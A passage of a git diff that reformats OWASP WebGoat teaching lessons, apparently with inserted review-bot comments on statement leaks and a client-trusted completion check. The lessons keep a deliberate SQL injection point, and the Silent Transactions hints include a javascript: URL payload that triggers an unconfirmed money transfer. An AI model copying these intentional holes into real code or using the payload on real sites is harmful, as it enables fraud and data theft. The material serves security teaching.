.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } + + private void updateLessonStatus(WebSession s, Employee employee) + { + try + { + String userId = 
getSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID); + String employeeId = s.getParser().getRawParameter(SQLInjection.EMPLOYEE_ID); + String stage = getStage(s); + if (SQLInjection.STAGE3.equals(stage)) + { + // If the employee we are viewing is the prize and we are not authorized to have it, + // the stage is completed + if (employee != null && employee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID + && !isAuthorizedForEmployee(s, Integer.parseInt(userId), employee.getId())) + { + setStageComplete(s, SQLInjection.STAGE3); + } + } + else if (SQLInjection.STAGE4.equals(stage)) + { + // If we were denied the employee to view, and we would have been able to view it + // in the broken state, the stage is completed. + // This assumes the student hasn't modified getEmployeeProfile_BACKUP(). + if (employee == null) + { + Employee targetEmployee = null; + try + { + targetEmployee = getEmployeeProfile_BACKUP(s, userId, employeeId); + } catch (UnauthorizedException e) + { + } + if (targetEmployee != null && targetEmployee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID) + { + setStageComplete(s, SQLInjection.STAGE4); + } + } + } + } catch (ParameterNotFoundException pnfe) + { + } } - catch (ParameterNotFoundException pnfe) - {} - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java index 5d41998c6..709228153 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
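Review bot: The `Statement` and `ResultSet` created in `getEmployeeProfile` (and the identical pair in `getEmployeeProfile_BACKUP`) are never closed on any path, so every profile view leaks a JDBC statement until whatever owns the connection from `WebSession.getConnection(s)` closes it; the reformat carries that over unchanged. The string-built query on `userId`/`subjectUserId` is the lesson's intended Stage 3 injection point and should stay, but the leak is unrelated to the exercise and is worth fixing independently by hoisting `answer_statement` out of the inner `try` and closing it in a `finally` with an explicit null check, as the fragment below shows. Separately, `updateLessonStatus` swallows `UnauthorizedException` and `ParameterNotFoundException` in empty catch blocks; a one-line comment such as `// Stage-4 check is best-effort: a missing employee_id or a denied lookup simply leaves the stage incomplete` would make that deliberate choice visible to the next reader.
```java
Statement answer_statement = null;
try
{
    answer_statement = WebSession.getConnection(s)
            .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
    ResultSet answer_results = answer_statement.executeQuery(query);
    // … unchanged: row-to-Employee mapping …
} catch (SQLException sqle)
{
    s.setMessage("Error getting employee profile");
    sqle.printStackTrace();
} finally
{
    // Closing the Statement also releases its ResultSet.
    if (answer_statement != null)
    {
        try { answer_statement.close(); } catch (SQLException ignored) { }
    }
}
```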
@@ -21,184 +21,160 @@ import org.owasp.webgoat.session.*; public class SameOriginPolicyProtection extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - - ec.addElement(new Script() - .setSrc("javascript/sameOrigin.js")); - - Input hiddenWGStatus = new Input(Input.HIDDEN,"hiddenWGStatus",0); - hiddenWGStatus.setID("hiddenWGStatus"); - ec.addElement(hiddenWGStatus); - - Input hiddenGoogleStatus = new Input(Input.HIDDEN,"hiddenGoogleStatus",0); - hiddenGoogleStatus.setID("hiddenGoogleStatus"); - ec.addElement(hiddenGoogleStatus); - - - - ec.addElement(new StringElement("Enter a URL: ")); - ec.addElement(new BR()); + ElementContainer ec = new ElementContainer(); - TextArea urlArea = new TextArea(); - urlArea.setID("requestedURL"); - urlArea.setRows(1); - urlArea.setCols(60); - urlArea.setWrap("SOFT"); - ec.addElement(urlArea); + try + { - - button b = new button(); - b.setValue("Go!"); - b.setType(button.button); - b.setName("Go!"); - b.setOnClick("submitXHR();"); - b.addElement("Go!"); - ec.addElement(b); - - - - - - ec.addElement(new BR()); - ec.addElement(new BR()); - - - - - H3 reponseTitle = new H3("Response: "); - reponseTitle.setID("responseTitle"); - - - 
ec.addElement(reponseTitle); - //ec.addElement(new BR()); - - - TextArea ta = new TextArea(); - ta.setName("responseArea"); - ta.setID("responseArea"); - ta.setCols(60); - ta.setRows(4); - ec.addElement(ta); - ec.addElement(new BR()); - - - - - String webGoatURL = "lessons/Ajax/sameOrigin.jsp"; - String googleURL = "http://www.google.com/search?q=aspect+security"; - - ec.addElement(new BR()); - - A webGoat = new A(); - webGoat.setHref("javascript:populate(\"" + webGoatURL + "\")"); - webGoat.addElement("Click here to try a Same Origin request:
" + webGoatURL); - ec.addElement(webGoat); - - ec.addElement(new BR()); - ec.addElement(new BR()); - - A google = new A(); - google.setHref("javascript:populate(\"" + googleURL + "\")"); - google.addElement("Click here to try a Different Origin request:
" + googleURL); - ec.addElement(google); - - - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + ec.addElement(new Script().setSrc("javascript/sameOrigin.js")); + + Input hiddenWGStatus = new Input(Input.HIDDEN, "hiddenWGStatus", 0); + hiddenWGStatus.setID("hiddenWGStatus"); + ec.addElement(hiddenWGStatus); + + Input hiddenGoogleStatus = new Input(Input.HIDDEN, "hiddenGoogleStatus", 0); + hiddenGoogleStatus.setID("hiddenGoogleStatus"); + ec.addElement(hiddenGoogleStatus); + + ec.addElement(new StringElement("Enter a URL: ")); + ec.addElement(new BR()); + + TextArea urlArea = new TextArea(); + urlArea.setID("requestedURL"); + urlArea.setRows(1); + urlArea.setCols(60); + urlArea.setWrap("SOFT"); + ec.addElement(urlArea); + + button b = new button(); + b.setValue("Go!"); + b.setType(button.button); + b.setName("Go!"); + b.setOnClick("submitXHR();"); + b.addElement("Go!"); + ec.addElement(b); + + ec.addElement(new BR()); + ec.addElement(new BR()); + + H3 reponseTitle = new H3("Response: "); + reponseTitle.setID("responseTitle"); + + ec.addElement(reponseTitle); + // ec.addElement(new BR()); + + TextArea ta = new TextArea(); + ta.setName("responseArea"); + ta.setID("responseArea"); + ta.setCols(60); + ta.setRows(4); + ec.addElement(ta); + ec.addElement(new BR()); + + String webGoatURL = "lessons/Ajax/sameOrigin.jsp"; + String googleURL = "http://www.google.com/search?q=aspect+security"; + + ec.addElement(new BR()); + + A webGoat = new A(); + webGoat.setHref("javascript:populate(\"" + webGoatURL + "\")"); + webGoat.addElement("Click here to try a Same Origin request:
" + webGoatURL); + ec.addElement(webGoat); + + ec.addElement(new BR()); + ec.addElement(new BR()); + + A google = new A(); + google.setHref("javascript:populate(\"" + googleURL + "\")"); + google.addElement("Click here to try a Different Origin request:
" + googleURL); + ec.addElement(google); + + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus", 0); + int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus", 0); + + System.out.println("hiddenWGStatus:" + hiddenWGStatusInt); + System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt); + + if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1) + { + makeSuccess(s); + } + + return (ec); } - - - - int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus",0); - int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus",0); - - System.out.println("hiddenWGStatus:" + hiddenWGStatusInt); - System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt); - - - if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1) + /** + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value + */ + public List getHints(WebSession s) { - makeSuccess(s); + List hints = new ArrayList(); + hints.add("Enter a URL to see if it is allowed."); + hints.add("Click both of the links below to complete the lesson"); + + return hints; } - return (ec); - } + /** + * Gets the ranking attribute of the HelloScreen object + * + * @return The ranking value + */ + private final static Integer DEFAULT_RANKING = new Integer(10); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Enter a URL to see if it is allowed."); - hints.add("Click both of the links below to complete the lesson"); + protected Category getDefaultCategory() + { + return Category.AJAX_SECURITY; + } - return hints; - } + /** + * Gets the title attribute of the HelloScreen object + * + * 
@return The title value + */ + public String getTitle() + { + return ("Same Origin Policy Protection"); + } - /** - * Gets the ranking attribute of the HelloScreen object - * - * @return The ranking value - */ - private final static Integer DEFAULT_RANKING = new Integer(10); + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } + public String getInstructions(WebSession s) + { + String instructions = "This exercise demonstrates the " + + "Same Origin Policy Protection. XHR requests can only be passed back to " + + " the originating server. Attempts to pass data to a non-originating server " + " will fail."; - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - protected Category getDefaultCategory() - { - return Category.AJAX_SECURITY; - } - - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Same Origin Policy Protection"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } - public String getInstructions(WebSession s) { - String instructions = "This exercise demonstrates the " + - "Same Origin Policy Protection. XHR requests can only be passed back to " + - " the originating server. Attempts to pass data to a non-originating server " + - " will fail."; - - return (instructions); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java index 56dd2224d..70dbe1b7b 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import org.apache.ecs.Element; 
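Review bot: Lesson completion in `createContent` is decided entirely by the client-supplied `hiddenWGStatus` and `hiddenGoogleStatus` request parameters (`getIntParameter(..., 0)` followed by `makeSuccess(s)` when both equal 1), so a single request carrying `hiddenWGStatus=1&hiddenGoogleStatus=1` marks the lesson solved without any XHR ever being attempted; if self-reported completion is acceptable for a teaching lesson, say so at that check, e.g. `// Completion is self-reported by sameOrigin.js through these hidden fields and is not verified server-side.` The two `System.out.println` lines that dump those values on every render look like debugging leftovers and should be removed rather than reformatted. The instruction text also states that requests to a non-originating server "will fail", whereas in practice the browser typically sends the request and refuses to expose the response; since that distinction is the point of the lesson, the wording is worth tightening.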
@@ -7,133 +8,131 @@ import org.owasp.webgoat.session.LessonTracker;
 import org.owasp.webgoat.session.SequentialLessonTracker;
 import org.owasp.webgoat.session.WebSession;
-public abstract class SequentialLessonAdapter extends LessonAdapter {
+public abstract class SequentialLessonAdapter extends LessonAdapter
+{
- public void setStage(WebSession s, int stage)
- {
- // System.out.println("Changed to stage " + stage);
- getLessonTracker(s).setStage(stage);
- }
+ public void setStage(WebSession s, int stage)
+ {
+ // System.out.println("Changed to stage " + stage);
+ getLessonTracker(s).setStage(stage);
+ }
- /* By default returns 1 stage.
- * (non-Javadoc)
- */
- public int getStageCount() {
- return 1;
- }
+ /*
+ * By default returns 1 stage. (non-Javadoc)
+ */
+ public int getStageCount()
+ {
+ return 1;
+ }
- public int getStage(WebSession s)
- {
- int stage = getLessonTracker(s).getStage();
+ public int getStage(WebSession s)
+ {
+ int stage = getLessonTracker(s).getStage();
- // System.out.println("In stage " + stage);
- return stage;
- }
+ // System.out.println("In stage " + stage);
+ return stage;
+ }
 @Override
- public SequentialLessonTracker getLessonTracker(WebSession s) {
- return (SequentialLessonTracker) super.getLessonTracker(s);
- }
-
+ public SequentialLessonTracker getLessonTracker(WebSession s)
+ {
+ return (SequentialLessonTracker) super.getLessonTracker(s);
+ }
 @Override
- public SequentialLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) {
+ public SequentialLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
+ {
 return (SequentialLessonTracker) super.getLessonTracker(s, lesson);
 }
-
 @Override
- public SequentialLessonTracker getLessonTracker(WebSession s, String userNameOverride) {
+ public SequentialLessonTracker getLessonTracker(WebSession s, String userNameOverride)
+ {
 return (SequentialLessonTracker) super.getLessonTracker(s, userNameOverride);
 }
 @Override
- public LessonTracker createLessonTracker() {
+ public LessonTracker createLessonTracker()
+ {
 return new SequentialLessonTracker();
 }
- protected Element createStagedContent(WebSession s)
- {
- try
+ protected Element createStagedContent(WebSession s)
 {
- int stage = getLessonTracker(s).getStage();
- //int stage = Integer.parseInt( getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE,"1"));
+ try
+ {
+ int stage = getLessonTracker(s).getStage();
+ // int stage = Integer.parseInt(
+ // getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE,"1"));
- switch (stage)
- {
- case 1:
- return (doStage1(s));
- case 2:
- return (doStage2(s));
- case 3:
- return (doStage3(s));
- case 4:
- return (doStage4(s));
- case 5:
- return (doStage5(s));
- case 6:
- return (doStage6(s));
- default:
- throw new Exception("Invalid stage");
- }
- }
- catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- System.out.println(e);
- e.printStackTrace();
+ switch (stage)
+ {
+ case 1:
+ return (doStage1(s));
+ case 2:
+ return (doStage2(s));
+ case 3:
+ return (doStage3(s));
+ case 4:
+ return (doStage4(s));
+ case 5:
+ return (doStage5(s));
+ case 6:
+ return (doStage6(s));
+ default:
+ throw new Exception("Invalid stage");
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error generating " + this.getClass().getName());
+ System.out.println(e);
+ e.printStackTrace();
+ }
+
+ return (new StringElement(""));
 }
- return (new StringElement(""));
- }
+ protected Element doStage1(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 1 Stub");
+ return ec;
+ }
+ protected Element doStage2(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 2 Stub");
+ return ec;
+ }
- protected Element doStage1(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 1 Stub");
- return ec;
- }
+ protected Element doStage3(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 3 Stub");
+ return ec;
+ }
+ protected Element doStage4(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 4 Stub");
+ return ec;
+ }
- protected Element doStage2(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 2 Stub");
- return ec;
- }
+ protected Element doStage5(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 5 Stub");
+ return ec;
+ }
+ protected Element doStage6(WebSession s) throws Exception
+ {
+ ElementContainer ec = new ElementContainer();
+ ec.addElement("Stage 6 Stub");
+ return ec;
+ }
- protected Element doStage3(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 3 Stub");
- return ec;
- }
-
-
- protected Element doStage4(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 4 Stub");
- return ec;
- }
-
-
- protected Element doStage5(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 5 Stub");
- return ec;
- }
-
-
- protected Element doStage6(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement("Stage 6 Stub");
- return ec;
- }
-
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
index ecb983b4e..d74b167b5 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 import java.io.PrintWriter;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -20,296 +20,270 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
- * @author Sherif Koussa Macadamian Technologies.
- * @created December 26, 2006
+ * @author Sherif Koussa Macadamian Technologies.
+ * @created December 26, 2006
 */
 public class SilentTransactions extends LessonAdapter
 {
- private final static Integer DEFAULT_RANKING = new Integer(40);
+ private final static Integer DEFAULT_RANKING = new Integer(40);
- private final static Double CURRENT_BALANCE = 11987.09;
+ private final static Double CURRENT_BALANCE = 11987.09;
- private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
- "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+ private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+ .setBorder(0).setHspace(0).setVspace(0);
- public void handleRequest(WebSession s)
- {
-
- try
+ public void handleRequest(WebSession s)
 {
- if (s.getParser().getRawParameter("from", "").equals("ajax"))
- {
- if (s.getParser().getRawParameter("confirm", "").equals(
- "Confirm"))
+
+ try
 {
- String amount = s.getParser().getRawParameter("amount", "");
- s.getResponse().setContentType("text/html");
- s.getResponse().setHeader("Cache-Control", "no-cache");
- PrintWriter out = new PrintWriter(s.getResponse()
- .getOutputStream());
- StringBuffer result = new StringBuffer();
- result
- .append("

* Congratulations. You have successfully completed this lesson.
"); - if (!amount.equals("")) - { - result.append("You have just silently authorized "); - result.append(amount); - result.append("$ without the user interaction.
"); - } - result - .append("Now you can send out a spam email containing this link and whoever clicks on it
"); - result - .append(" and happens to be logged in the same time will loose their money !!"); - out.print(result.toString()); - out.flush(); - out.close(); - getLessonTracker(s).setCompleted(true); - return; - } - else if (s.getParser().getRawParameter("confirm", "").equals( - "Transferring")) + if (s.getParser().getRawParameter("from", "").equals("ajax")) + { + if (s.getParser().getRawParameter("confirm", "").equals("Confirm")) + { + String amount = s.getParser().getRawParameter("amount", ""); + s.getResponse().setContentType("text/html"); + s.getResponse().setHeader("Cache-Control", "no-cache"); + PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); + StringBuffer result = new StringBuffer(); + result.append("

* Congratulations. You have successfully completed this lesson.
"); + if (!amount.equals("")) + { + result.append("You have just silently authorized "); + result.append(amount); + result.append("$ without the user interaction.
"); + } + result + .append("Now you can send out a spam email containing this link and whoever clicks on it
"); + result.append(" and happens to be logged in the same time will loose their money !!"); + out.print(result.toString()); + out.flush(); + out.close(); + getLessonTracker(s).setCompleted(true); + return; + } + else if (s.getParser().getRawParameter("confirm", "").equals("Transferring")) + { + s.getResponse().setContentType("text/html"); + s.getResponse().setHeader("Cache-Control", "no-cache"); + PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); + out.print("

The Transaction has Completed Successfully."); + out.flush(); + out.close(); + return; + } + } + } catch (Exception ex) { - s.getResponse().setContentType("text/html"); - s.getResponse().setHeader("Cache-Control", "no-cache"); - PrintWriter out = new PrintWriter(s.getResponse() - .getOutputStream()); - out - .print("

The Transaction has Completed Successfully.");
- out.flush();
- out.close();
- return;
+ ex.printStackTrace();
 }
- }
- }
- catch (Exception ex)
- {
- ex.printStackTrace();
+
+ Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+
+ form.addElement(createContent(s));
+
+ setContent(form);
+ }
- Form form = new Form(getFormAction(), Form.POST).setName("form")
- .setEncType("");
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Current WebSession
+ */
- form.addElement(createContent(s));
+ protected Element createContent(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+ String lineSep = System.getProperty("line.separator");
+ String script = "" + lineSep;
- setContent(form);
+ ec.addElement(new StringElement(script));
+ ec.addElement(new H1("Welcome to WebGoat Banking System"));
+ ec.addElement(new BR());
+ ec.addElement(new H3("Account Summary:"));
- }
+ Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1).setWidth("70%").setAlign("left");
+ ec.addElement(new BR());
+ TR tr = new TR();
+ tr.addElement(new TD(new StringElement("Account Balance:")));
+ tr.addElement(new TD(new StringElement("
" + CURRENT_BALANCE.toString() + "$
")));
+ t1.addElement(tr);
+ tr = new TR();
+ tr.addElement(new TD(new StringElement("Transfer to Account:")));
+ Input newAccount = new Input();
+ newAccount.addAttribute("id", "newAccount");
+ newAccount.setType(Input.TEXT);
+ newAccount.setName("newAccount");
+ newAccount.setValue("");
+ tr.addElement(new TD(newAccount));
+ t1.addElement(tr);
- /**
- * Description of the Method
- *
- * @param s Current WebSession
- */
+ tr = new TR();
+ tr.addElement(new TD(new StringElement("Transfer Amount:")));
+ Input amount = new Input();
+ amount.addAttribute("id", "amount");
+ amount.setType(Input.TEXT);
+ amount.setName("amount");
+ amount.setValue(0);
+ tr.addElement(new TD(amount));
+ t1.addElement(tr);
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String lineSep = System.getProperty("line.separator");
- String script = "" + lineSep;
+ ec.addElement(t1);
+ ec.addElement(new BR());
+ ec.addElement(new BR());
- ec.addElement(new StringElement(script));
- ec.addElement(new H1("Welcome to WebGoat Banking System"));
- ec.addElement(new BR());
- ec.addElement(new H3("Account Summary:"));
+ ec.addElement(new PRE());
+ Input b = new Input();
+ b.setType(Input.BUTTON);
+ b.setName("confirm");
+ b.addAttribute("id", "confirm");
+ b.setValue("Confirm");
+ b.setOnClick("processData();");
+ ec.addElement(b);
- Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1)
- .setWidth("70%").setAlign("left");
- ec.addElement(new BR());
- TR tr = new TR();
- tr.addElement(new TD(new StringElement("Account Balance:")));
- tr.addElement(new TD(new StringElement("
" - + CURRENT_BALANCE.toString() + "$
")));
- t1.addElement(tr);
+ ec.addElement(new BR());
+ Div div = new Div();
+ div.addAttribute("name", "resultsDiv");
+ div.addAttribute("id", "resultsDiv");
+ div.setStyle("font-weight: bold;color:red;");
+ ec.addElement(div);
- tr = new TR();
- tr.addElement(new TD(new StringElement("Transfer to Account:")));
- Input newAccount = new Input();
- newAccount.addAttribute("id", "newAccount");
- newAccount.setType(Input.TEXT);
- newAccount.setName("newAccount");
- newAccount.setValue("");
- tr.addElement(new TD(newAccount));
- t1.addElement(tr);
+ return ec;
+ }
- tr = new TR();
- tr.addElement(new TD(new StringElement("Transfer Amount:")));
- Input amount = new Input();
- amount.addAttribute("id", "amount");
- amount.setType(Input.TEXT);
- amount.setName("amount");
- amount.setValue(0);
- tr.addElement(new TD(amount));
- t1.addElement(tr);
+ protected Category getDefaultCategory()
+ {
+ return Category.AJAX_SECURITY;
+ }
- ec.addElement(t1);
- ec.addElement(new BR());
- ec.addElement(new BR());
+ protected List getHints(WebSession s)
+ {
+ List hints = new ArrayList();
+ hints.add("Check the javascript in the HTML source.");
+ hints.add("Check how the application calls a specific javascript function to execute the transaction.");
+ hints.add("Check the javascript functions processData and submitData()");
+ hints.add("Function submitData() is the one responsible for actually ececuting the transaction.");
+ hints.add("Check if your browser supports running javascript from the address bar.");
+ hints.add("Try to navigate to 'javascript:submitData(1234556,11000);'");
+ return hints;
- ec.addElement(new PRE());
- Input b = new Input();
- b.setType(Input.BUTTON);
- b.setName("confirm");
- b.addAttribute("id", "confirm");
- b.setValue("Confirm");
- b.setOnClick("processData();");
- ec.addElement(b);
+ }
- ec.addElement(new BR());
- Div div = new Div();
- div.addAttribute("name", "resultsDiv");
- div.addAttribute("id", "resultsDiv");
- div.setStyle("font-weight: bold;color:red;");
- ec.addElement(div);
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
- return ec;
- }
+ /**
+ * Gets the title attribute of the HelloScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Silent Transactions Attacks");
+ }
-
- protected Category getDefaultCategory()
- {
- return Category.AJAX_SECURITY;
- }
-
-
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Check the javascript in the HTML source.");
- hints
- .add("Check how the application calls a specific javascript function to execute the transaction.");
- hints
- .add("Check the javascript functions processData and submitData()");
- hints
- .add("Function submitData() is the one responsible for actually ececuting the transaction.");
- hints
- .add("Check if your browser supports running javascript from the address bar.");
- hints.add("Try to navigate to 'javascript:submitData(1234556,11000);'");
- return hints;
-
- }
-
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Silent Transactions Attacks");
- }
-
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
+ public Element getCredits()
+ {
+ return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
index b9ecd06e9..6220ec8be 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
@@ -1,9 +1,8 @@
 /*
- * Created on May 26, 2005
- *
- * TODO To change the template for this generated file go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * Created on May 26, 2005 TODO To change the template for this generated file go to Window -
+ * Preferences - Java - Code Style - Code Templates
 */
+
 package org.owasp.webgoat.lessons;
 import java.sql.Connection;
@@ -12,7 +11,6 @@ import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -28,476 +26,454 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
